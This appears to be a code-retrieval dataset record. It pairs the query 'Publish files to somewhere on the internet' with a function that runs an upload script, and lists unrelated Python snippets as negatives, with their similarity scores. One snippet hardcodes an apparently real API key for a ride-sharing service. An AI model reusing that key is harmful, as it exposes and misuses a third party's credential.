open(folder_name+station+'_'+tag_name+'.json', 'wt')\n json.dump(dic, outfile, indent=4)\n\n outfile.close()", "def calculate_demo(self, request, parent_lookup_client, pk, format=None):\n\n retirement_plan = self.get_object()\n tickers = Ticker.objects.filter(~Q(state=Ticker.State.CLOSED.value))\n portfolio = []\n projection = []\n for idx, ticker in enumerate(tickers[:10]):\n percent = 0\n if idx <= 9:\n # 10% each for first 10 tickers\n percent = 10\n portfolio.append([ticker.id, percent])\n # grab 50 evenly spaced time points between dob and current time\n today = timezone.now().date()\n last_day = retirement_plan.client.date_of_birth + relativedelta(years=retirement_plan.selected_life_expectancy)\n day_interval = (last_day - today) / 49\n income_start = 20000\n assets_start = 100000\n for i in range(50):\n income = income_start + (i * 50)\n assets = assets_start + (i * 1000)\n dt = today + i * day_interval\n projection.append([d2ed(dt), assets, income])\n return Response({'portfolio': portfolio, 'projection': projection})", "def _calc_times():\n\n app.logger.debug(\"Got a JSON request\")\n\n km = request.args.get('km', 999, type=float)\n distance = request.args.get('distance', 200, type=int)\n begin_time = request.args.get('begin_time', type=str)\n begin_date = request.args.get('begin_date', type=str)\n\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n\n print(begin_date + \" \" + begin_time)\n start_arrow = arrow.get(begin_date + \" \" + begin_time, \"YYYY-MM-DD HH:mm\")\n print('start', start_arrow.isoformat())\n\n open_time = acp_times.open_time(km, distance, start_arrow)\n close_time = acp_times.close_time(km, distance, start_arrow)\n result = {\"open\": open_time, \"close\": close_time}\n\n return flask.jsonify(result=result)", "async def test_source_up_to_dateness(self):\n response = await self.collect(get_request_json_return_value={\"timestamp\": \"1565284457173\"})\n expected_age = days_ago(datetime_fromtimestamp(1565284457173 / 1000.0))\n self.assert_measurement(response, value=str(expected_age))", "def get_tide_data():\n # Get raw JSON data\n magtag.url = get_data_source_url(hilo_only=False)\n raw_data = magtag.fetch()\n\n # Results will be stored in a list that is PLOT_WIDTH long\n new_tide_data = [PLOT_HEIGHT - 1] * PLOT_WIDTH\n\n # Convert raw data to display coordinates\n for data in raw_data:\n _, t = data[\"t\"].split(\" \") # date and time\n h, m = t.split(\":\") # hours and minutes\n v = data[\"v\"] # water level\n x = round((PLOT_WIDTH - 1) * (60 * float(h) + float(m)) / 1434)\n y = (PLOT_HEIGHT // 2) - round(VSCALE * float(v))\n y = 0 if y < 0 else y\n y = PLOT_HEIGHT - 1 if y >= PLOT_HEIGHT else y\n new_tide_data[x] = y\n\n return new_tide_data", "def Tobs_given_day(date):\n\n results = session.query(Measurement.date,Measurement.tobs).\\\nfilter(Measurement.date.between(One_yrs_ago,current_time)).\\\nfilter(func.strftime(\"%Y-%m-%d\",Measurement.date)==date).all()\n \n results1=[results[i][1] for i in range(len(results))]\n results={results[0][0]:results1}\n print(f\"Route /api/v1.0/precipitation/<date> with <date>={date} is being visited\")\n return jsonify(results)", "def stats(self):", "def measurements():\n print(\"server received request for precipitation data...\")\n return jsonify(measurements_data)", "def cat():\n echo_json(fetch_holidays())", "def _print_detail(peak: Activity, max: Dict[str, List[int]]):\n\n # Find the date, start time, and duration.\n rowid = format(peak.rowid, \"<5d\")\n date = peak.start_time.strftime(\"%a %d %b, %Y\")\n start = peak.start_time.strftime(\"%H:%M\")\n duration = str(peak.end_time - peak.start_time).rjust(8)\n\n # Find the activity name\n distance = (format(round(peak.distance / 1000, 2), \".2f\") + \"km\").rjust(8)\n elevation = (str(peak.elevation) + \"m\").rjust(6) if peak.elevation else \"\".rjust(6)\n activity_name = peak.activity_name.ljust(80) if peak.activity_name else \"\".ljust(80)\n\n # Find each peak value.\n p5sec = str(peak.peak_5sec_hr).rjust(4) if peak.peak_5sec_hr else \" \"\n p30sec = str(peak.peak_30sec_hr).rjust(4) if peak.peak_30sec_hr else \" \"\n p60sec = str(peak.peak_60sec_hr).rjust(4) if peak.peak_60sec_hr else \" \"\n p5min = str(peak.peak_5min_hr).rjust(4) if peak.peak_5min_hr else \" \"\n p10min = str(peak.peak_10min_hr).rjust(4) if peak.peak_10min_hr else \" \"\n p20min = str(peak.peak_20min_hr).rjust(4) if peak.peak_20min_hr else \" \"\n p30min = str(peak.peak_30min_hr).rjust(4) if peak.peak_30min_hr else \" \"\n p60min = str(peak.peak_60min_hr).rjust(4) if peak.peak_60min_hr else \" \"\n p90min = str(peak.peak_90min_hr).rjust(4) if peak.peak_90min_hr else \" \"\n p120min = str(peak.peak_120min_hr).rjust(4) if peak.peak_120min_hr else \" \"\n\n # Helper to decorate a peak with ANSI escape sequence highlights.\n def _decorate(val: int, max: List[int], label: str) -> str:\n if max is None or val is None:\n return label\n if val >= max[0]:\n label = \"\\x1B[37;41m\" + label + \"\\x1B[0m\"\n elif val >= max[1]:\n label = \"\\x1B[30;43m\" + label + \"\\x1B[0m\"\n elif len(max) > 2 and val >= max[2]:\n label = \"\\x1B[30;47m\" + label + \"\\x1B[0m\"\n return label\n\n # Highlight those peaks in this activity that are the highest peak we've ever seen.\n p5sec = _decorate(peak.peak_5sec_hr, max[\"5sec\"], p5sec)\n p30sec = _decorate(peak.peak_30sec_hr, max[\"30sec\"], p30sec)\n p60sec = _decorate(peak.peak_60sec_hr, max[\"60sec\"], p60sec)\n p5min = _decorate(peak.peak_5min_hr, max[\"5min\"], p5min)\n p10min = _decorate(peak.peak_10min_hr, max[\"10min\"], p10min)\n p20min = _decorate(peak.peak_20min_hr, max[\"20min\"], p20min)\n p30min = _decorate(peak.peak_30min_hr, max[\"30min\"], p30min)\n p60min = _decorate(peak.peak_60min_hr, max[\"60min\"], p60min)\n p90min = _decorate(peak.peak_90min_hr, max[\"90min\"], p90min)\n p120min = _decorate(peak.peak_120min_hr, max[\"120min\"], p120min)\n\n # Print the data.\n print(\n f\"{rowid} {date} {activity_name} {distance} {elevation} {start} {duration} {p5sec} {p30sec} {p60sec} {p5min} {p10min} {p20min} {p30min} {p60min} {p90min} {p120min}\"\n )", "def update_stats():\r\n\turl = \"https://www.pathofexile.com/\" + \"api/trade/data/stats\"\r\n\tsave_path = \"data/stats.json\"\r\n\tr = requests.get(url)\r\n\twith open(save_path, \"w\") as fileID:\r\n\t\tfileID.write(r.text)", "def mark_tasks(data):\n try:\n i =0\n while i<30:\n new_date = (date.today() + timedelta(days=i)).strftime(\"%d-%m-%Y\")\n if data.get(new_date)==None:\n i+=1\n continue\n \n os.system(\"clear\")\n message = \"\"\" \\t\\t===============Mark tasks ============== \"\"\"\n print(message)\n print(\"\\nAt date: \", new_date)\n new_lst = [[x[0],idx] for idx,x in enumerate(data[new_date]) if x[1]<0]\n\n for j in range(len(new_lst)):\n print(\"\\t-{} {}\".format(j+1, new_lst[j][0]))\n \n if len(new_lst)==0:\n i+=1\n print(\"\\tNo tasks remaining here.\") \n continue\n\n c1 = int(\"0\"+input(\"\\nChoose the task between [{}-{}] to mark as complete. \\nChoose {} or more to goto next date. \\nChoose 0 to terminate: \".format(min(1,len(new_lst)),len(new_lst), len(new_lst)+1)))\n \n if c1==0:\n break\n elif c1>len(new_lst):\n i+=1\n continue\n \n # c2 = int(input(\"\\nChoose the task between [1-{}] to mark as complete: \".format(len(new_lst))))\n \n data[new_date][new_lst[c1-1][1]][1]*=-1\n print(\"\\n[$$$]Marked as complete!!!\\n\")\n c2 = int(\"0\"+input(\"Mark more here? y(0), n(anything else): \"))\n if c2!=0:\n i+=1\n # json.dump(data,open(TODO_FILE, \"w+\"))\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n except :\n print(\"Some error occurred\")\n finally:\n write_file(data)", "def rpm_since_float(since):\n data = monitor.get_current_workout()\n return jsonify(data)", "def main():\n # Load and parse json object from file with specific\n file_name = \"./benchmark.log\"\n doc = re.sub(\"[\\n|\\t]\", \"\", \"\".join(benchmark.read_text_file(file_name)))\n json_object = json.loads(\"\".join(doc))\n\n intervals = json_object[\"intervals\"]\n\n socket_keys = benchmark.get_socket_keys(intervals)\n\n result = benchmark.get_result_dictionary(intervals, socket_keys)\n\n print_to_csv(result, socket_keys)", "def read_emijrp_json(json_file):\n with open(json_file, \"rb\") as f:\n data = json.load(f)\n f.close()\n count = 0\n previous_count = 0\n tz = WlmTZ()\n daily_count = dict() # upload count by day\n total_count = dict() # cumulative upload count by day\n user_count = dict() # upload count by user\n userd_count = dict() # user count by day\n usernd_count= dict() # new user count by day\n for k in data:\n image_info = data[k]\n user = image_info[u'username']\n datetime_image = parse_date(image_info[u'date'].strip(), tz)\n date_image = datetime.datetime.strftime(datetime_image, \"%Y-%m-%d\")\n\n if(datetime_image.date()>=START and datetime_image.date()<END) and (image_info['country']==THIS_WLM):\n #user\n if user in user_count:\n user_count[user] = user_count[user]+1\n else:\n user_count[user] = 1\n if date_image in daily_count:\n daily_count[date_image] = daily_count[date_image] +1\n total_count[date_image] = total_count[date_image] + 1\n if(not (user in userd_count[date_image])):\n userd_count[date_image].append(user)\n else:\n previous_count = count -1\n daily_count[date_image] = 1\n total_count[date_image] = previous_count +1\n userd_count[date_image] = []\n usernd_count[date_image] = []\n userd_count[date_image].append(user)\n if(user_count[user] <= 1):\n usernd_count[date_image].append(user)\n count = count +1\n return {\n 'count': count,\n 'daily count': daily_count,\n 'total count': total_count,\n 'user count': user_count,\n 'user count by day': userd_count,\n 'new user count by day': usernd_count\n }", "def search_for_trips(date, start_point, end_point):\n # round date to next hour to adapt to api's behavior\n url = 'https://public-api.blablacar.com/api/v3/trips'\n\n # formated_date = date + timedelta(seconds=3599)\n formated_date = dt(date.year,date.month,date.day,date.hour)\n formated_date = dt.strftime(formated_date, '%Y-%m-%dT%H:%m:%S')\n params = { 'key' : '4RiVIJL2JNqgR9qH2ISI4afoRZ9Humgx',\n 'from_coordinate' : str(start_point[0]) + ',' + str(start_point[1]),\n 'to_coordinate' : str(end_point[0]) + ',' + str(end_point[1]),\n 'currency' : 'EUR',\n 'locale' : 'fr-FR',\n 'start_date_local': formated_date,\n 'count' : 10\n }\n\n time_before_call = time.perf_counter()\n # logger.info('juste avant le post trainline')\n response = requests.get(url, params=params)\n\n if response.status_code == 200:\n return format_blablacar_response(response.json(), date, start_point, end_point)\n else :\n print(response.json())", "def main():\n # Pull variables from pf\n profileref = pfget('google_mapfeed.pf', profile)\n dbname = profileref['dbname']\n path = profileref['webbase']\n finalfile = '%s/%s' % (path, profileref['file'])\n bufferfile = '%s+' % finalfile\n max_nquakes = 600\n element_fields = ['lat', 'lon', 'depth', 'time', 'local_timestring', 'utc_timestring', 'magnitude', 'auth']\n\n if verbose:\n print \"Start: Creating main JSON file '%s' for all stations at %s\" % (finalfile, time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\n now = time.time()\n # Set time zone\n os.putenv('TZ','US/Pacific')\n time.tzset()\n if verbose:\n print \"The time zone is: %s\" % (time.tzname)[0]\n print \"The current time is: %s\" % now\n\n # Override defaults\n if override_number:\n if verbose:\n print \"Overriding default number of events (%d) with %d\" % (max_nquakes, override_number)\n nquakes = override_number\n else:\n nquakes = max_nquakes\n if override_timerange:\n if verbose:\n print \"Overiding default number of events (%d) with time range %d seconds\" % (max_nquakes, override_timerange)\n nquakes = False\n\n # Database processing\n if verbose:\n print \"Opening database\";\n print \"Number of events requested: %s\" % nquakes\n db = dbopen(dbname, 'r')\n\n '''\n Occasionally there is more than one magnitude for a single orid\n (such as provided by QED). We need the most recent magnitude for\n a given orid, so sort on orid and lddate, then group on orid,\n then get the most recent record number (greatest lddate) for each\n group. Add that to a dictionary we will use later.\n '''\n netmag_dict = {}\n db_netmag = dblookup(db, table='netmag')\n db_netmag.sort(['orid', 'lddate'])\n db_netmag_grp = dbgroup(db_netmag, 'orid')\n if verbose:\n print \"There are %s records\" % db_netmag_grp.query('dbRECORD_COUNT')\n for i in range(db_netmag_grp.query('dbRECORD_COUNT')):\n db_netmag_grp[3] = i\n orid, [dbptr, view, end_record, start_record] = db_netmag_grp.getv('orid', 'bundle')\n if verbose:\n print \"\\t- Iteration: %s: Orid: %s, Start record: %s, End record: %s\"% (i, orid, start_record, end_record)\n db_netmag[3] = end_record - 1\n if verbose:\n print \"\\t\\t- Magnitude: %s, Magtype: %s\" % (db_netmag.getv('magnitude')[0], db_netmag.getv('magtype')[0] )\n magnitude, magtype = db_netmag.getv('magnitude', 'magtype')\n netmag_dict[orid] = { 'rec':end_record, 'magnitude':magnitude, 'magtype':magtype }\n\n '''\n if verbose:\n for key in sorted(netmag_dict.iterkeys()):\n print \"%s: %s\" % (key, netmag_dict[key])\n '''\n\n '''\n Now get the event information\n '''\n db.lookup(table='origin')\n db.join('event')\n if verbose:\n print \"Number of joined records of event and origin tables: %s\" % db.query('dbRECORD_COUNT')\n if override_timerange:\n override_oldest = now - override_timerange\n if verbose:\n print \"Override time defined - get events in the last %s seconds - 'time >= %s'\" % (override_timerange, override_oldest)\n db.subset('time >= %d' % override_oldest)\n if verbose:\n print \"Subset on time. Number of records: %s\" % db.query('dbRECORD_COUNT')\n # Join views\n # db_joined = dbjoin(db, db_netmag)\n\n if verbose:\n print \"Subset orid == prefor\"\n db.subset('orid == prefor')\n if verbose:\n print \"Number of subsetted records: %s\" % db.query('dbRECORD_COUNT')\n print \"Subset for time != NULL\"\n db.subset('time != NULL')\n if verbose:\n print \"Number of subsetted records: %s\" % db.query('dbRECORD_COUNT')\n # We want the most recent first for the comparison with nquakes\n db.sort(['time'], reverse=True)\n if verbose:\n print \"Number of sorted records: %s\" % db.query('dbRECORD_COUNT')\n if nquakes:\n if db.query('dbRECORD_COUNT') > nquakes:\n db[3] = nquakes - 1\n min_time = db.getv('time')[0]\n db.subset(\"time >= %s\" % min_time)\n else:\n override_oldest = now - override_timerange\n if verbose:\n print \"Override time defined - get events in the last %s seconds - time > %s\" % (override_timerange, override_oldest)\n db.subset(\"time >= %s\" % override_oldest)\n # Sort in normal time - we want the most recent events plotted on top\n db.sort(('time'))\n if verbose:\n print \"Number of records without subset on time: %s\" % db.query('dbRECORD_COUNT')\n '''\n Build event dictionary\n '''\n event_dict = {'metadata':{},'events':{}}\n\n '''\n Build metadata dictionary\n '''\n if nquakes:\n event_dict['metadata']['max_nquakes'] = nquakes\n event_dict['metadata']['oldest_time_readable'] = epoch2str( int(min_time), \"%H:%M UTC %A %B %o, %Y\" )\n event_dict['metadata']['oldest_time'] = int(min_time)\n event_dict['metadata']['type'] = 'event_limited'\n elif override_oldest:\n event_dict['metadata']['time_range'] = int(override_timerange)\n event_dict['metadata']['oldest_time_readable'] = epoch2str( int(override_oldest), \"%H:%M UTC %A %B %o, %Y\" )\n event_dict['metadata']['oldest_time'] = int(override_oldest)\n event_dict['metadata']['type'] = 'time_limited'\n event_dict['metadata']['modification_time'] = int(time.time())\n event_dict['metadata']['modification_time_readable'] = epoch2str( int(time.time()), \"%H:%M UTC %A %B %o, %Y\" )\n\n '''\n Build event dictionary\n '''\n events = {}\n for i in range(db.query('dbRECORD_COUNT')):\n db[3] = i\n if verbose:\n epoch_time, orid = db.getv('time', 'orid')\n print \"\\tRecord number is: %s Orid is: %d Time is: %s\" % (db[3], orid, epoch2str(epoch_time, '%Y-%m-%d %H:%M:%S'))\n\n orid = db.getv('orid')[0]\n\n if orid in netmag_dict:\n events[i] = {}\n for ef in element_fields:\n # Parse values\n if ef is 'local_timestring' or ef is 'utc_timestring' or ef is 'time':\n value = dbgetv(db, 'time')[0]\n difference = float(now) - float(value)\n if difference < 6 * 3600:\n color = 'red'\n elif difference < 12 * 3600:\n color = 'orange'\n elif difference < 24 * 3600:\n color = 'yellow'\n elif difference < 72 * 3600:\n color = 'chartreuse'\n elif difference < 168 * 3600:\n color = 'blue'\n else:\n color = 'grey'\n events[i]['color'] = color\n elif ef is 'depth':\n value = dbgetv(db, 'depth')[0]\n elif ef is 'auth':\n value = dbgetv(db, 'auth')[0]\n elif ef is 'magnitude':\n # Magnitude\n # mlval, mbval, msval, magnitudeval, magtypeval = db.getv('ml', 'mb', 'ms', 'magnitude', 'magtype')\n # Null magnitude is -999.00\n magnitudeval = netmag_dict[orid]['magnitude']\n magtypeval = netmag_dict[orid]['magtype']\n if int(magnitudeval) > 0:\n scale = magtypeval\n value = '%.1f' % magnitudeval\n else:\n scale = ''\n value = 'N/A'\n events[i]['scale'] = scale\n else:\n value = dbgetv(db, ef)\n\n # Override formatting for specific fields\n if ef is 'lat' or ef is 'lon':\n value = '%.4f' % value\n elif ef is 'local_timestring':\n value = epoch2str( value, \"%H:%M:%S %Z %A %B %o, %Y\", \"US/Pacific\" )\n elif ef is 'utc_timestring':\n value = epoch2str( value, \"%H:%M:%S UTC %A %B %o, %Y\" )\n events[i][ef] = value\n\n full_lat, full_lon = db.getv('lat', 'lon')\n events[i]['grname'] = (grname(full_lat,full_lon)).title()\n events[i]['srname'] = (srname(full_lat,full_lon)).title()\n\n event_dict['events'] = events\n\n # Dump JSON file\n f = open(bufferfile, 'w') \n json.dump(event_dict, f, sort_keys=True, indent=2)\n f.flush()\n\n # Move the file to replace the older one\n try:\n os.rename(bufferfile, finalfile)\n except OSError:\n print \"Cannot rename JSON file from %s to %s\" % (bufferfile,finalfile)\n\n if verbose:\n print \"End: Creating main JSON file '%s' for all stations %s\" % (finalfile, time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\n db.close()\n return 0", "def ajax_get_statistics():\r\n return jsonify(generate_statistics())", "def process_weather(forecast_file):\n # Load json data file\n \n with open(forecast_file) as json_file:\n json_data = json.load(json_file)\n \n # Set Variables, Dictionaries and Lists\n days_list = []\n temp_dict = {}\n daily_dict = {}\n\n num_items = 0\n total_sum_min = 0\n total_sum_max = 0\n days = len(json_data['DailyForecasts'])\n days_list = days_in_data(days)\n\n t_temp_min = 100\n t_temp_max = 0\n\n # Pull through the data\n\n for day in days_list:\n num_items += 1\n date = convert_date(json_data['DailyForecasts'][day]['Date'])\n min_temp = convert_f_to_c(json_data['DailyForecasts'][day]['Temperature']['Minimum']['Value'])\n total_sum_min += min_temp\n max_temp = convert_f_to_c(json_data['DailyForecasts'][day]['Temperature']['Maximum']['Value'])\n total_sum_max += max_temp\n day_desc = json_data['DailyForecasts'][day]['Day']['LongPhrase']\n chance_rain_day = json_data['DailyForecasts'][day]['Day']['RainProbability']\n night_desc = json_data['DailyForecasts'][day]['Night']['LongPhrase']\n chance_rain_night = json_data['DailyForecasts'][day]['Night']['RainProbability']\n \n if min_temp < t_temp_min:\n t_temp_min = min_temp\n t_temp_mindate = date\n else:\n pass\n if max_temp > t_temp_max:\n t_temp_max = max_temp\n t_temp_maxdate = date\n else:\n pass\n \n daily_dict[day] = [date, min_temp, max_temp, day_desc, chance_rain_day, night_desc, chance_rain_night]\n # 0 1 2 3 4 5 6 \n \n # print(temp_dict)\n # print(daily_dict)\n\n # Calculate Minimum, Maximum and Mean temperatures\n\n mean_min = format_temperature(calculate_mean(total_sum_min, num_items))\n # print(mean_min)\n mean_max = format_temperature(calculate_mean(total_sum_max, num_items))\n # print(mean_max)\n\n # Format Minimum and Maximum temperatures\n min_temp_format = format_temperature(t_temp_min)\n max_temp_format = format_temperature(t_temp_max)\n\n ##############################################################################################\n\n # Combine string messages to return to user\n\n str_Output = \"\"\n Output_gen1 = (f\"{num_items} Day Overview\\n\")\n Output_gen2 = (f\" The lowest temperature will be {min_temp_format}, and will occur on {t_temp_mindate}.\\n\")\n Output_gen3 = (f\" The highest temperature will be {max_temp_format}, and will occur on {t_temp_maxdate}.\\n\")\n Output_gen4 = (f\" The average low this week is {mean_min}.\\n\")\n Output_gen5 = (f\" The average high this week is {mean_max}.\\n\")\n str_Output = Output_gen1 + Output_gen2 + Output_gen3 + Output_gen4 + Output_gen5\n for key, value in daily_dict.items():\n Output_daily0 = (\"\\n\")\n Output_daily1 = (f\"-------- {value[0]} --------\\n\")\n Output_daily2 = (f\"Minimum Temperature: {format_temperature(value[1])}\\n\")\n Output_daily3 = (f\"Maximum Temperature: {format_temperature(value[2])}\\n\")\n Output_daily4 = (f\"Daytime: {value[3]}\\n\")\n Output_daily5 = (f\" Chance of rain: {value[4]}%\\n\")\n Output_daily6 = (f\"Nighttime: {value[5]}\\n\")\n Output_daily7 = (f\" Chance of rain: {value[6]}%\\n\")\n str_Output = str_Output + Output_daily0 + Output_daily1 + Output_daily2 + Output_daily3 + Output_daily4 + Output_daily5 + Output_daily6 + Output_daily7\n str_Output = str_Output +\"\\n\"\n\n return str_Output", "def tstamps():\n\n # Parse the URL parameters \"begin\" and \"length\".\n errors = list()\n try:\n begin = flask.request.args.get('begin')\n t_begin = coils.string2time(begin)\n assert t_begin != None\n except:\n errors.append('Failed to parse \"begin\" parameter.')\n try:\n length = int(flask.request.args.get('length'))\n except:\n errors.append('Failed to parse \"length\" parameter.')\n\n # Bail on any errors.\n if errors:\n return flask.jsonify(errors=errors)\n\n # Compute the end time.\n t_end = t_begin + dt.timedelta(seconds=length) if length > 0 else dt.datetime.now()\n\n # Retrieve image timestamps.\n images = db.session.query(mapping.Image.time).\\\n filter(mapping.Image.time > t_begin).\\\n filter(mapping.Image.time < t_end).\\\n group_by(mapping.Image.time).all()\n images = [ii[0] for ii in images]\n\n return flask.jsonify(\n size=len(images),\n images=images,\n )", "def timetaken_vs_support(confidence_threshold, coverage_threshold, top_k_rules):\n print(\"\\nPlotting time taken to extract rules vs support_threshold\\n\")\n print(\"top_k_rules is {}\".format(top_k_rules))\n print(\"Confidence Threshold is {}\".format(confidence_threshold))\n print(\"Coverage Threshold is {}\\n\".format(coverage_threshold))\n\n support_threshold_list = [i/10 for i in range(1,11)]\n timetaken_list = []\n\n table_printer = TablePrinter(2)\n table_printer.set_column_headers(\"Support Threshold\", \"Time Taken\")\n table_printer.set_column_widths(30, 30)\n\n table_printer.begin()\n \n for sup_th in support_threshold_list:\n t = time.time()\n apriori.learn(sup_th, confidence_threshold, coverage_threshold, verbose = True)\n time_taken = time.time() - t\n table_printer.append_row(sup_th, round(time_taken*1000, 3))\n timetaken_list.append(time_taken)\n\n table_printer.end()\n\n plot('support_threshold', 'learning_time(seconds)', support_threshold_list, timetaken_list, [0, 1, 0, 500])", "def get(self, request, *args, **kwargs):\n query = '''\n SELECT\n DATE(bs.\"CreatedAt\"),\n count(1)\n FROM\n blood_sample_bloodsample as bs\n WHERE now() - '36 hour'::interval > bs.\"CreatedAt\" AND \\\n bs.\"State\" in ('0','4')\n GROUP BY DATE(bs.\"CreatedAt\") order by DATE(bs.\"CreatedAt\")\n '''\n\n with connection.cursor() as cursor:\n cursor.execute(query)\n processed_not_ontime = [\n [row[0], row[1]]\n for row in cursor.fetchall() if row[1]\n ]\n\n return JsonResponse(\n {\n 'status': 200,\n 'processed_not_ontime': processed_not_ontime,\n 'processed_hours': settings.PROCESSING_HOURS,\n }\n )", "def testResponseTime( pid=\"rpnt\", count=500 ) :\n pp.projectStatus2( pid )\n for i in range( count ) :\n t1 = time.time()\n sobs = \"x\"+str(i)\n sc.newProject(pid ,sobs)\n t2 = time.time()\n print \" %d %f \" % (i, t2-t1)" ]
[ "0.5688149", "0.55947673", "0.5528684", "0.55030835", "0.5432563", "0.53793204", "0.5325283", "0.53094494", "0.52589875", "0.51901346", "0.51684177", "0.5168089", "0.5163765", "0.5146831", "0.511869", "0.5105191", "0.50967735", "0.5090349", "0.5079822", "0.5079822", "0.5079822", "0.5078533", "0.50360924", "0.5035626", "0.5029966", "0.5018392", "0.5015583", "0.5009065", "0.49963132", "0.49933022", "0.49908444", "0.49882305", "0.49744022", "0.49687853", "0.49476096", "0.49390823", "0.49380988", "0.4929218", "0.4926364", "0.49211913", "0.4917141", "0.491458", "0.49138978", "0.4912976", "0.49107668", "0.48990276", "0.48966733", "0.48845983", "0.48844102", "0.48842332", "0.48778355", "0.48750806", "0.48713914", "0.4856228", "0.4843894", "0.48406616", "0.4830668", "0.48223984", "0.48156726", "0.4815157", "0.481146", "0.48045865", "0.48021534", "0.47936165", "0.47935426", "0.479325", "0.4793236", "0.47891775", "0.47871718", "0.4778681", "0.4773949", "0.47703326", "0.47589496", "0.47575244", "0.4756467", "0.47534138", "0.47420287", "0.47402552", "0.47398022", "0.47369215", "0.47362474", "0.4733547", "0.47279766", "0.47256586", "0.4724747", "0.47232985", "0.47218597", "0.47171864", "0.47123352", "0.47117025", "0.47113118", "0.47077146", "0.47003186", "0.46984243", "0.4697378", "0.46958613", "0.4695707", "0.46949667", "0.46910688", "0.46894372" ]
0.6560097
0
Publish files to somewhere on the internet.
def publish_files(): print("Publishing files to the internet...", end="", flush=True) import subprocess try: subprocess.run("./upload.sh", timeout=120.0) print("done.\n") except: print("failed.\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def publish(self, filename):\n # 1) Encrypt file\n # 2) Publish to remote cloud server\n # 3) Wait for the result\n # 4) Store results in files located inside RAM folder", "def publish():\n if sys.argv[-1] == 'publish':\n os.system('python setup.py sdist')\n os.system('twine upload dist/*')\n sys.exit()", "def publish():\n pass", "def publish():\n fab.local(\"env/bin/python setup.py sdist\")\n tar_filename = fab.local(\n \"env/bin/python setup.py --fullname\", capture=True\n )\n dist_filename = \"dist/{}.tar.gz\".format(tar_filename)\n fab.put(dist_filename, PYREPO_DIR)", "def publish(self, path):\n self.logger.info(\"Publishing %s\", path)\n try:\n self.set_workspace()\n workspace_path = getcwd()\n if workspace_path != commonpath([workspace_path, abspath(path)]):\n self.logger.error(\"Attempt to publish a non-local file %s\", path)\n raise ContextError(\n f\"Only local workspace files can be published! PATH={path}\"\n )\n if not isfile(path):\n self.logger.error(\"Attempt to publish a non-file path %s\", path)\n raise ContextError(f\"Only files can be published! PATH={path}\")\n # publish the file\n target_path = join(self._path_perm, relpath(path))\n targer_url = urljoin(self._url_base, relpath(path))\n if not isdir(self._path_perm):\n raise MissingContextError(\n f\"Permanent directory does not exist! PATH={self._path_perm}\"\n )\n if not exists(dirname(target_path)):\n makedirs(dirname(target_path))\n move(path, target_path)\n except Exception as error:\n self.logger.warning(\"Failed to publish %s! %s\", path, error)\n raise\n self.logger.debug(\"moved %s -> %s\", path, target_path)\n return target_path, targer_url", "def publish():\n reset()\n compress()\n build()\n s3deploy()\n log_success()", "def files_distribute(self):\n self._post('files/distribute')", "def checkin(url, files, message=None):\n from grit import Repo, Item\n r = Repo(url)\n\n if not files:\n raise GritError('No files')\n\n def _write(path):\n item = Item.from_path(repo=r, path=path)\n if r.isLocal():\n v.addItem(item=item)\n else:\n r.upload(filename=os.path.basename(path), filedata=open(path, 'r').read())\n\n if r.isLocal():\n v = r.addVersion()\n count = 1\n total = len(files) \n while count <= total:\n print '[%s/%s] %0.2f%%' %(count, total, (float(count) / total) * 100), '*'*count, '\\r',\n _write(os.path.abspath(files[count-1]))\n count += 1\n sys.stdout.flush()\n if message is None:\n message = 'Publishing %s' % ', '.join(files)\n if r.isLocal():\n v.save(message=message)\n print", "def pubone(file_name,alg,host):\n\n hash_alg=alg\n scheme=\"ni\"\n rform=\"json\"\n ext=\"{ \\\"meta\\\": { \\\"pubdirs\\\" : \\\"yep\\\" } }\"\n\n # record start time of this\n stime=time.time()\n\n # Create NIdigester for use with form encoder and StreamingHTTP\n ni_digester = NIdigester()\n # Install the template URL built from the scheme, the authority and the digest algorithm\n rv = ni_digester.set_url((scheme, host, \"/%s\" % hash_alg))\n if rv != ni_errs.niSUCCESS:\n nilog(\"Cannot construct valid ni URL: %s\" % ni_errs_txt[rv])\n return\n debug(ni_digester.get_url())\n # Open the file if possible\n try:\n f = open(file_name, \"rb\")\n except Exception, e :\n debug(\"Cannot open file %s: Error: %s\" %(file_name, str(e)))\n return\n # Guess the mimetype of the file\n m = magic.Magic(mime=True)\n ctype = m.from_file(file_name)\n debug(\"Content-Type: %s\" % ctype)\n if ctype is None:\n # Guessing didn't work - default\n ctype = \"application/octet-stream\"\n # Set up HTTP form data for publish request\n # Make parameter for file with digester\n octet_param = MultipartParam(\"octets\",\n fileobj=f,\n filetype=ctype,\n filename=file_name,\n digester = ni_digester)\n # Make dictionary that will dynamically retrieve ni URI when it has been made\n uri_dict = { \"generator\": octet_param.get_url,\n \"length\": (len(ni_digester.get_url()) + len(\";\") +\n ni_digester.get_b64_encoded_length())}\n msgid=str(random.randint(1, 2**64)) \n param_list = [octet_param,\n (\"URI\", uri_dict),\n (\"msgid\", msgid),\n (\"ext\", ext),\n (\"fullPut\", \"yes\"),\n (\"rform\", rform)]\n # Construct data generator and header strings\n datagen, headers = multipart_encode(param_list)\n if verbose:\n debug(\"Parameters prepared: %s\"% \"\".join(datagen))\n\n # Set up streaming HTTP mechanism - register handlers with urllib2\n # get out for now, don't do it\n opener = streaminghttp.register_openers()\n # Where to send the publish request.\n http_url = \"http://%s/netinfproto/publish\" % host\n # debug(\"Accessing: %s\" % http_url)\n # Send POST request to destination server\n fsize=os.path.getsize(file_name)\n nilog(\"%s,PUBLISH tx,file,%s,size,%d,to,%s\" % (msgid,file_name,fsize,host))\n try:\n req = urllib2.Request(http_url, datagen, headers)\n except Exception, e:\n nilog(\"%s,PUBLISH tx error\" % msgid);\n if verbose:\n nilog(\"Error: Unable to create request for http URL %s: %s\" %\n (http_url, str(e)))\n f.close()\n return\n # Get HTTP results\n try:\n http_object = urllib2.urlopen(req)\n except Exception, e:\n nilog(\"%s,PUBLISH rx error\" % msgid);\n if verbose:\n nilog(\"Error: Unable to access http URL %s: %s\" % (http_url, str(e)))\n f.close()\n return\n f.close()\n if verbose:\n nilog(\"Digester result: %s\" % octet_param.get_url())\n # Get message headers\n http_info = http_object.info()\n http_result = http_object.getcode()\n if verbose:\n debug(\"HTTP result: %d\" % http_result)\n debug(\"Response info: %s\" % http_info)\n debug(\"Response type: %s\" % http_info.gettype())\n\n # Read results into 